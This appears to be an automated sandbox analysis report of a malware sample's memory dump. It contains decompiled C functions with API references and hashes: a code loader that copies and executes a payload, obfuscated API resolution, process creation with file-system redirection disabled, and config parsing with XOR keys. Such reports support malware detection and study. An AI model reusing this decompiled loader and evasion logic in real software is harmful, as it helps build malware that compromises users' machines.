0x00fa3d9f
0x00fa3da1
0x00fa3da8
0x00fa3dc0
0x00fa3dc4
0x00fa3dd0
0x00fa3dd5
0x00fa3dde
0x00fa3def
0x00fa3df3
0x00fa3dfc
0x00fa3e02
0x00fa3e0f
0x00fa3e1c
0x00fa3e22
0x00fa3e2e
0x00fa3e34
0x00fa3e39
0x00fa3e3a
0x00fa3e46
0x00fa3e4a
0x00fa3e4e
0x00fa3e54
0x00fa3e58
0x00fa3e5f
0x00fa3e66
0x00fa3e6a
0x00fa3e75
0x00fa3e7c
0x00fa3e80
0x00fa3e89
0x00fa3e89
0x00fa3e9a
0x00fa3e9a
0x00fa3ea9
0x00fa3eaf
0x00fa3eaf
0x00fa3eb9
0x00fa3eb9
0x00fa3eca
0x00fa3eca
0x00fa3ed8
0x00fa3ed8
0x00fa3ee8

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00FA3C50
GetTickCount.KERNEL32 ref: 00FA3C64
wsprintfA.USER32 ref: 00FA3CB3
wsprintfA.USER32 ref: 00FA3CD0
wsprintfA.USER32 ref: 00FA3CF1
wsprintfA.USER32 ref: 00FA3D0F
wsprintfA.USER32 ref: 00FA3D24
wsprintfA.USER32 ref: 00FA3D45
wsprintfA.USER32 ref: 00FA3D7F
wsprintfA.USER32 ref: 00FA3D9F
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA3DBA
GetTickCount.KERNEL32 ref: 00FA3DCA
RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA3DDE
RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA3DFC

Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F
Part of subcall function 00FA49EC: strcpy.NTDLL ref: 00FA4A36
Part of subcall function 00FA49EC: lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41
Part of subcall function 00FA49EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E

StrTrimA.SHLWAPI(00000000,00FAC2C4,00000000,03A49630), ref: 00FA3E2E

Part of subcall function 00FA9FA4: lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
Part of subcall function 00FA9FA4: lstrlen.KERNEL32(?), ref: 00FA9FB8
Part of subcall function 00FA9FA4: lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
Part of subcall function 00FA9FA4: lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA

lstrcpy.KERNEL32(00000000,?), ref: 00FA3E58
lstrcat.KERNEL32(00000000,00000000), ref: 00FA3E66
lstrcat.KERNEL32(00000000,00000000), ref: 00FA3E6A
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00FA3E9A
HeapFree.KERNEL32(00000000,00000000,0053002F,00000000), ref: 00FA3EA9
HeapFree.KERNEL32(00000000,00000000,00000000,03A49630), ref: 00FA3EB9
HeapFree.KERNEL32(00000000,?), ref: 00FA3ECA
HeapFree.KERNEL32(00000000,00000000), ref: 00FA3ED8

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 0baa2a19506fef67f37a5c2042134d03684de4cba8235c8a4b4cee527956fdec
Instruction ID: 27b9ac724ae7131ed045396029ffa7388f73901be15c097ff6b373d2dde6e4f8
Opcode Fuzzy Hash: 0baa2a19506fef67f37a5c2042134d03684de4cba8235c8a4b4cee527956fdec
Instruction Fuzzy Hash: 73713AF2900209AFD721DB68DC88E577BECEB8A710B054555F94AC3620E639E905EBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA3FC, Relevance: 15.1, APIs: 10, Instructions: 111
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00FAA3FC(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E00FA484A(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0xfad218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0xfad230; // 0x2a9a5a8
					_t18 = _t49 + 0xfae55b; // 0x73797325
					_t51 = E00FA99D3(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0xfad230; // 0x2a9a5a8
						_t20 = _t52 + 0xfae73d; // 0x3a48ce5
						_t21 = _t52 + 0xfae0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xfad1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E00FAA07B(_t74);
				goto L12;
			}

0x00faa405
0x00faa405
0x00faa413
0x00faa41c
0x00faa41f
0x00faa534
0x00faa53b
0x00faa53b
0x00faa42e
0x00faa439
0x00faa43e
0x00faa441
0x00faa456
0x00faa45c
0x00faa45d
0x00faa460
0x00faa466
0x00faa469
0x00faa46e
0x00faa476
0x00faa47d
0x00faa484
0x00faa487
0x00faa51b
0x00faa48d
0x00faa48d
0x00faa492
0x00faa499
0x00faa4ad
0x00faa4b1
0x00faa502
0x00faa4b3
0x00faa4b3
0x00faa4ba
0x00faa4c1
0x00faa4d9
0x00faa4df
0x00faa4e3
0x00faa4fd
0x00faa4e5
0x00faa4ee
0x00faa4f3
0x00faa4f3
0x00faa4e3
0x00faa513
0x00faa513
0x00faa487
0x00faa522
0x00faa52b
0x00faa52f
0x00000000

APIs

Part of subcall function 00FA484A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FAA418,?,?,?,?,00000000,00000000), ref: 00FA486F
Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FA4891
Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FA48A7
Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FA48BD
Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FA48D3
Part of subcall function 00FA484A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FA48E9

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00FAA42E
memset.NTDLL ref: 00FAA469

Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FA7E58,73797325), ref: 00FA99E4
Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FA99FE

GetModuleHandleA.KERNEL32(4E52454B,03A48CE5,73797325), ref: 00FAA4A0
GetProcAddress.KERNEL32(00000000), ref: 00FAA4A7
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FAA4C1
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FAA4DF
CloseHandle.KERNEL32(00000000), ref: 00FAA4EE
CloseHandle.KERNEL32(?), ref: 00FAA4F3
GetLastError.KERNEL32 ref: 00FAA4F7
HeapFree.KERNEL32(00000000,?), ref: 00FAA513

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
String ID:
API String ID: 1222765985-0
Opcode ID: 90cd766875612dff374d1fac21afece24f05134506b5a788f4970ad2249d6c1e
Instruction ID: c7ffa1cb935e29af9903d0164990086e1e9cae5171f6cfcf0eb9a8542a70e2c2
Opcode Fuzzy Hash: 90cd766875612dff374d1fac21afece24f05134506b5a788f4970ad2249d6c1e
Instruction Fuzzy Hash: EE4127B6D00219FFCB11ABA4DC48ADEBFB8EF0A354F144451E206E3120D7759A49EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6470, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00FA6470(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xfad2ec; // 0x3a49c40
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00FA69A9(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xfac1cc;
				}
				_t44 = E00FA99A0(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00FA550F(lstrlenW(0xfaead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xfaead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xfad230; // 0x2a9a5a8
						_t73 =  *0xfad120; // 0xfaaab3
						_t18 = _t75 + 0xfaead8; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00FA550F(lstrlenW(0xfaebf8) + _a8 + _t57 + _t58 + lstrlenW(0xfaebf8) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00FAA07B(_v16);
						} else {
							_t64 =  *0xfad230; // 0x2a9a5a8
							_t31 = _t64 + 0xfaebf8; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00FAA07B(_v8);
				}
				return _v20;
			}

0x00fa6470
0x00fa6478
0x00fa647e
0x00fa648e
0x00fa6491
0x00fa6498
0x00fa649b
0x00fa649d
0x00fa649d
0x00fa64a6
0x00fa64ad
0x00fa64b0
0x00fa64b6
0x00fa64c0
0x00fa64c9
0x00fa64d0
0x00fa64de
0x00fa64f0
0x00fa64f7
0x00fa64fa
0x00fa6503
0x00fa650c
0x00fa6515
0x00fa6523
0x00fa652b
0x00fa6530
0x00fa6533
0x00fa653e
0x00fa6555
0x00fa6559
0x00fa658c
0x00fa655b
0x00fa655e
0x00fa6566
0x00fa6571
0x00fa6579
0x00fa6581
0x00fa6585
0x00fa6585
0x00fa6559
0x00fa6594
0x00fa6599
0x00fa65a0

APIs

GetTickCount.KERNEL32 ref: 00FA6485
lstrlen.KERNEL32(00000000,80000002), ref: 00FA64C0
lstrlen.KERNEL32(?), ref: 00FA64C9
lstrlen.KERNEL32(00000000), ref: 00FA64D0
lstrlenW.KERNEL32(80000002), ref: 00FA64DE
lstrlenW.KERNEL32(00FAEAD8), ref: 00FA64E7
lstrlen.KERNEL32(?), ref: 00FA652B
lstrlen.KERNEL32(?), ref: 00FA6533
lstrlenW.KERNEL32(?), ref: 00FA653E
lstrlenW.KERNEL32(00FAEBF8), ref: 00FA6547

Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 0fc7a62d93870c493d88be48188a4ac985ceefaabaa408a120b8be1dc1de017c
Instruction ID: d2c5d8a5a5b3d45c1f7a54c5c635d1d9ca43b72ac18218d66082a2e7be89198d
Opcode Fuzzy Hash: 0fc7a62d93870c493d88be48188a4ac985ceefaabaa408a120b8be1dc1de017c
Instruction Fuzzy Hash: 9F3158B6D0021DAFCF01AFA4CC4499E7FB5FF4A354B098065E904A7221DB35DA15EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA49EC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00FA49EC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xfad230; // 0x2a9a5a8
				_t1 = _t9 + 0xfae61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00FA8990(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x3a49631
					_t41 = E00FA550F(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00FA51A8(_t34, _t41, _a8);
						E00FAA07B(_t41);
						_t42 = E00FA401A(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00FAA07B(_t36);
							_t36 = _t42;
						}
						_t43 = E00FA53E6(_t36, _t33);
						if(_t43 != 0) {
							E00FAA07B(_t36);
							_t36 = _t43;
						}
					}
					E00FAA07B(_t28);
				}
				return _t36;
			}

0x00fa49ec
0x00fa49ef
0x00fa49f0
0x00fa49f8
0x00fa49ff
0x00fa4a06
0x00fa4a0a
0x00fa4a10
0x00fa4a17
0x00fa4a1c
0x00fa4a24
0x00fa4a2e
0x00fa4a32
0x00fa4a36
0x00fa4a3c
0x00fa4a41
0x00fa4a51
0x00fa4a53
0x00fa4a6a
0x00fa4a6e
0x00fa4a71
0x00fa4a76
0x00fa4a76
0x00fa4a7f
0x00fa4a83
0x00fa4a86
0x00fa4a8b
0x00fa4a8b
0x00fa4a83
0x00fa4a8e
0x00fa4a8e
0x00fa4a99

APIs

Part of subcall function 00FA8990: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FA4A06,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F), ref: 00FA89F7
Part of subcall function 00FA8990: sprintf.NTDLL ref: 00FA8A18

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

strcpy.NTDLL ref: 00FA4A36
lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41

Part of subcall function 00FA51A8: lstrlen.KERNEL32(00000000,00000000,00FA3E0F,00FA3E0F,00000001,00000000,00000000,?,00FA4A50,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA51BF

Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E

Part of subcall function 00FA401A: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00FA4A6A,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4024
Part of subcall function 00FA401A: _snprintf.NTDLL ref: 00FA4082

Strings

=, xrefs: 00FA4A58

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 5c6d553d5ccd2a7cd9e7b2cf3a56fc3ba2ab1ac6a360f62c5cb9444d00d1daa8
Instruction ID: f3d8bc5efe4371549311bc680cb9ce40034603a2d945e4efe969e0878659888d
Opcode Fuzzy Hash: 5c6d553d5ccd2a7cd9e7b2cf3a56fc3ba2ab1ac6a360f62c5cb9444d00d1daa8
Instruction Fuzzy Hash: F511A0F39009297B4612BBB49C85CAF3AAD9E87BA03054015FA05D7201DFBCDD06B7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4D8D, Relevance: 9.2, APIs: 6, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00FA4D8D(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t18;
				signed int _t23;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t40;
				void* _t42;
				void* _t43;
				signed int _t45;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				void* _t70;
				intOrPtr _t85;

				_t71 = __ecx;
				_t18 =  *0xfad22c; // 0x63699bc3
				if(E00FA7B3F( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xfad27c = _v12;
				}
				_t23 =  *0xfad22c; // 0x63699bc3
				if(E00FA7B3F( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t70 = _v12;
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t65 =  *0xfad22c; // 0x63699bc3
						_t29 = E00FA289C(_t71, _t70, _t65 ^ 0x724e87bc);
					}
					if(_t29 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xfad1f8 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t61 =  *0xfad22c; // 0x63699bc3
						_t30 = E00FA289C(_t71, _t70, _t61 ^ 0x2b40cc40);
					}
					if(_t30 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xfad1fc = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t57 =  *0xfad22c; // 0x63699bc3
						_t31 = E00FA289C(_t71, _t70, _t57 ^ 0x3b27c2e6);
					}
					if(_t31 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xfad200 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t53 =  *0xfad22c; // 0x63699bc3
						_t32 = E00FA289C(_t71, _t70, _t53 ^ 0x0602e249);
					}
					if(_t32 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xfad004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t49 =  *0xfad22c; // 0x63699bc3
						_t33 = E00FA289C(_t71, _t70, _t49 ^ 0x3603764c);
					}
					if(_t33 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xfad02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t45 =  *0xfad22c; // 0x63699bc3
						_t34 = E00FA289C(_t71, _t70, _t45 ^ 0x2cc1f2fd);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t42 = 0x10;
						_t43 = E00FA8E3C(_t42);
						if(_t43 != 0) {
							_push(_t43);
							E00FA6BB2();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t40 =  *0xfad22c; // 0x63699bc3
						_t35 = E00FA289C(_t71, _t70, _t40 ^ 0xb30fc035);
					}
					if(_t35 != 0 && E00FA8E3C(0, _t35) != 0) {
						_t85 =  *0xfad2d4; // 0x3a49630
						E00FAA302(_t85 + 4, _t38);
					}
					HeapFree( *0xfad1f0, 0, _t70);
					L48:
					return 0;
				}
			}

0x00fa4d8d
0x00fa4d90
0x00fa4db0
0x00fa4dbe
0x00fa4dbe
0x00fa4dc3
0x00fa4ddd
0x00fa4f64
0x00fa4f66
0x00000000
0x00fa4de3
0x00fa4de3
0x00fa4dea
0x00fa4e00
0x00fa4dec
0x00fa4dec
0x00fa4df9
0x00fa4df9
0x00fa4e0a
0x00fa4e0c
0x00fa4e16
0x00fa4e1b
0x00fa4e1b
0x00fa4e16
0x00fa4e22
0x00fa4e38
0x00fa4e24
0x00fa4e24
0x00fa4e31
0x00fa4e31
0x00fa4e3c
0x00fa4e3e
0x00fa4e48
0x00fa4e4d
0x00fa4e4d
0x00fa4e48
0x00fa4e54
0x00fa4e6a
0x00fa4e56
0x00fa4e56
0x00fa4e63
0x00fa4e63
0x00fa4e6e
0x00fa4e70
0x00fa4e7a
0x00fa4e7f
0x00fa4e7f
0x00fa4e7a
0x00fa4e86
0x00fa4e9c
0x00fa4e88
0x00fa4e88
0x00fa4e95
0x00fa4e95
0x00fa4ea0
0x00fa4ea2
0x00fa4eac
0x00fa4eb1
0x00fa4eb1
0x00fa4eac
0x00fa4eb8
0x00fa4ece
0x00fa4eba
0x00fa4eba
0x00fa4ec7
0x00fa4ec7
0x00fa4ed2
0x00fa4ed4
0x00fa4ede
0x00fa4ee3
0x00fa4ee3
0x00fa4ede
0x00fa4eea
0x00fa4f00
0x00fa4eec
0x00fa4eec
0x00fa4ef9
0x00fa4ef9
0x00fa4f04
0x00fa4f06
0x00fa4f09
0x00fa4f0a
0x00fa4f11
0x00fa4f13
0x00fa4f14
0x00fa4f14
0x00fa4f11
0x00fa4f1b
0x00fa4f31
0x00fa4f1d
0x00fa4f1d
0x00fa4f2a
0x00fa4f2a
0x00fa4f35
0x00fa4f43
0x00fa4f4d
0x00fa4f4d
0x00fa4f5a
0x00fa4f67
0x00fa4f6b
0x00fa4f6b

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E12
StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E44
StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4E76
StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4EA8
StrToIntExA.SHLWAPI(00000000,00000000,00FA7260,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4EDA
HeapFree.KERNEL32(00000000,?,?,00FA7260,63699BC3,?,00FA7260,63699BC3,E8FA7DD7,00FAD00C,745EC740,?,?,00FA7260), ref: 00FA4F5A

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a671b1add4694fc418f3ff42e783127051d7ff2c648b0966a973761e7f9e1cce
Instruction ID: 401b74b8d927dbe8052a5e0019dc95bf0e2ed67513591bfdf51d89ec86df41cf
Opcode Fuzzy Hash: a671b1add4694fc418f3ff42e783127051d7ff2c648b0966a973761e7f9e1cce
Instruction Fuzzy Hash: E05170F5A10208AECB10EBB89CC5D5BB7EDABCE750B244925B502D3105E6B5FD01BA60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9574, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00FA95D0
SysAllocString.OLEAUT32(0070006F), ref: 00FA95E4
SysAllocString.OLEAUT32(00000000), ref: 00FA95F6
SysFreeString.OLEAUT32(00000000), ref: 00FA965A
SysFreeString.OLEAUT32(00000000), ref: 00FA9669
SysFreeString.OLEAUT32(00000000), ref: 00FA9674

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 71d7d159310818afea703c9f6ad9bd95b31c9360b62d3fe62435986a25f2aed3
Instruction ID: 25afcaa87f7571f5c5d8fb63874c1170490b5d958042691c2417ab74549ed005
Opcode Fuzzy Hash: 71d7d159310818afea703c9f6ad9bd95b31c9360b62d3fe62435986a25f2aed3
Instruction Fuzzy Hash: B3314F72D00609AFDB01DFA8C844A9FB7BAAF4A310F158465ED11EB220DBB5AD05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FA484A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA484A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00FA550F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xfad230; // 0x2a9a5a8
					_t1 = _t23 + 0xfae11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xfad230; // 0x2a9a5a8
					_t2 = _t26 + 0xfae787; // 0x7243775a
					_v8 = 0x7f;
